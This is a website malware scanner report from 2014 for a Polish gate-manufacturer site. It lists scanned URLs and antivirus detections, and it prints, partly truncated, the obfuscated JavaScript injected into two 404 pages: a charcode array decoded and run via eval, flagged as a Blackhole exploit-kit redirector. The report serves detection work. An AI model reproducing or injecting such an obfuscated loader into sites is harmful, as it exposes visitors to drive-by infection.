Malware Scanner report for bramkiobrotowe.gastop.com.pl

Malicious/Suspicious/Total urls checked: 2/0/25

2 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://www.bramkiobrotowe.gastop.com.pl/	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 May 2014 15:24:42 GMT Location: http://www.gastop.com.pl/ Server: INPL 2.1 Content-Type: text/html; charset=iso-8859-1	clean
http://www.gastop.com.pl/	200 OK Content-Length: 17340 Content-Type: text/html	clean
http://www.gastop.com.pl/js/prototype.js	200 OK Content-Length: 126135 Content-Type: application/javascript	clean
http://www.bramkiobrotowe.gastop.com.pl/js/scriptaculous.js?load=effects,builder	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 May 2014 15:24:43 GMT Location: http://www.gastop.com.pl/js/scriptaculous.js?load=effects,builder Server: INPL 2.1 Content-Type: text/html; charset=iso-8859-1	clean
http://www.gastop.com.pl/js/scriptaculous.js?load=effects,builder	200 OK Content-Length: 2656 Content-Type: application/javascript	clean
http://www.bramkiobrotowe.gastop.com.pl/js/lightbox.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 May 2014 15:24:43 GMT Location: http://www.gastop.com.pl/js/lightbox.js Server: INPL 2.1 Content-Type: text/html; charset=iso-8859-1	clean
http://www.gastop.com.pl/js/lightbox.js	200 OK Content-Length: 18378 Content-Type: application/javascript	clean
http://www.bramkiobrotowe.gastop.com.pl/menu/menu.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 May 2014 15:24:44 GMT Location: http://www.gastop.com.pl/menu/menu.js Server: INPL 2.1 Content-Type: text/html; charset=iso-8859-1	clean
http://www.gastop.com.pl/menu/menu.js	200 OK Content-Length: 6619 Content-Type: application/javascript	clean
http://www.bramkiobrotowe.gastop.com.pl/Scripts/swfobject_modified.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 May 2014 15:24:44 GMT Location: http://www.gastop.com.pl/Scripts/swfobject_modified.js Server: INPL 2.1 Content-Type: text/html; charset=iso-8859-1	clean
http://www.gastop.com.pl/scripts/swfobject_modified.js	404 Not Found Content-Length: 3719 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=202;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,99,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,99,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,93,108,105,40,45,97,38,97,105,104,9 ... 753 bytes are skipped ...,26,118,4,2,25,26,27,23,24,25,26,27,91,103,92,111,104,92,102,109,40,114,105,97,109,95,35,30,52,93,99,113,23,97,93,55,87,30,96,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,99,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,95,33,52,7,5,23,24,25,26,120,4,2,118,35,35,32,51);s="";for(i=0;i-447!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);} Antivirus reports: AntiVir JS/iFrame.afu.12 Avast JS:Iframe-XJ [Trj] Ikarus Exploit.JS.Blacole nProtect JS:Trojan.JS.Agent.GO K7AntiVirus Riskware Comodo TrojWare.JS.BlacoleRef.W McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.400 Kaspersky Trojan.JS.Redirector.xb Microsoft Exploit:JS/Blacole.KH MicroWorld-eScan JS:Trojan.JS.Agent.GO Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Agent.bdetht F-Secure JS:Trojan.JS.Agent.GO F-Prot JS/Blacole.DC.gen AVG HTML/Framer Norman Agent.AMAYB GData JS:Trojan.JS.Agent.GO Commtouch JS/Blacole.DC.gen BitDefender JS:Trojan.JS.Agent.GO
http://linkhelp.clients.google.com/tbproxy/lh/wm/fixurl.js	200 OK Content-Length: 47623 Content-Type: text/javascript	clean
http://www.bramkiobrotowe.gastop.com.pl/test404page.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 May 2014 15:24:45 GMT Location: http://www.gastop.com.pl/test404page.js Server: INPL 2.1 Content-Type: text/html; charset=iso-8859-1	clean
http://www.gastop.com.pl/test404page.js	404 Not Found Content-Length: 3719 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=202;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,99,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,99,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,93,108,105,40,45,97,38,97,105,104,9 ... 753 bytes are skipped ...,26,118,4,2,25,26,27,23,24,25,26,27,91,103,92,111,104,92,102,109,40,114,105,97,109,95,35,30,52,93,99,113,23,97,93,55,87,30,96,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,99,30,33,39,91,107,103,93,103,94,62,95,97,101,94,35,95,33,52,7,5,23,24,25,26,120,4,2,118,35,35,32,51);s="";for(i=0;i-447!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);} Antivirus reports: AntiVir JS/iFrame.afu.12 Avast JS:Iframe-XJ [Trj] Ikarus Exploit.JS.Blacole nProtect JS:Trojan.JS.Agent.GO K7AntiVirus Riskware Comodo TrojWare.JS.BlacoleRef.W McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.400 Kaspersky Trojan.JS.Redirector.xb Microsoft Exploit:JS/Blacole.KH MicroWorld-eScan JS:Trojan.JS.Agent.GO Fortinet JS/Iframe.W!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Agent.bdetht F-Secure JS:Trojan.JS.Agent.GO F-Prot JS/Blacole.DC.gen AVG HTML/Framer Norman Agent.AMAYB GData JS:Trojan.JS.Agent.GO Commtouch JS/Blacole.DC.gen BitDefender JS:Trojan.JS.Agent.GO
http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js	200 OK Content-Length: 92629 Content-Type: text/javascript	clean
http://dl.dropbox.com/u/18926497/jquery.cssmap.js	HTTP/1.1 302 FOUND Cache-Control: no-cache Connection: close Date: Mon, 12 May 2014 15:24:45 GMT Pragma: no-cache Location: http://dl.dropboxusercontent.com/u/18926497/jquery.cssmap.js Server: nginx Content-Type: text/html; charset=utf-8 X-RequestId: 43e878301b775b0edc42494f9d05838b	clean
http://dl.dropboxusercontent.com/u/18926497/jquery.cssmap.js	200 OK Content-Length: 20820 Content-Type: application/javascript	clean
https://apis.google.com/js/plusone.js	200 OK Content-Length: 11733 Content-Type: application/javascript	clean
http://maps.google.com/maps?file=api&v=2&sensor=false&key=ABQIAAAAoWVOb3n7Aat9a7t0L-J0ZxQztN_rgU8ZjhpyI1bs_q5GQuOL3BR1HwP4S19wdPl2Wb0PrZxuA5T_Ng	200 OK Content-Length: 4965 Content-Type: text/javascript	clean
http://www.bramkiobrotowe.gastop.com.pl/fancyapps/lib/jquery-1.8.2.min.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 May 2014 15:24:47 GMT Location: http://www.gastop.com.pl/fancyapps/lib/jquery-1.8.2.min.js Server: INPL 2.1 Content-Type: text/html; charset=iso-8859-1	clean
http://www.gastop.com.pl/fancyapps/lib/jquery-1.8.2.min.js	200 OK Content-Length: 93435 Content-Type: application/javascript	clean
http://www.bramkiobrotowe.gastop.com.pl/fancyapps/lib/jquery.mousewheel-3.0.6.pack.js	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 May 2014 15:24:47 GMT Location: http://www.gastop.com.pl/fancyapps/lib/jquery.mousewheel-3.0.6.pack.js Server: INPL 2.1 Content-Type: text/html; charset=iso-8859-1	clean
http://www.gastop.com.pl/fancyapps/lib/jquery.mousewheel-3.0.6.pack.js	200 OK Content-Length: 1384 Content-Type: application/javascript	clean
http://www.bramkiobrotowe.gastop.com.pl/fancyapps/source/jquery.fancybox.js?v=2.1.3	HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 May 2014 15:24:47 GMT Location: http://www.gastop.com.pl/fancyapps/source/jquery.fancybox.js?v=2.1.3 Server: INPL 2.1 Content-Type: text/html; charset=iso-8859-1	clean
http://www.gastop.com.pl/fancyapps/source/jquery.fancybox.js?v=2.1.3	200 OK Content-Length: 47880 Content-Type: application/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bramkiobrotowe.gastop.com.pl

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: bramkiobrotowe.gastop.com.pl
Referer: http://www.google.com/search?q=bramkiobrotowe.gastop.com.pl

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bramkiobrotowe.gastop.com.pl

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://bramkiobrotowe.gastop.com.pl/

Result: bramkiobrotowe.gastop.com.pl is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for bramkiobrotowe.gastop.com.pl

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools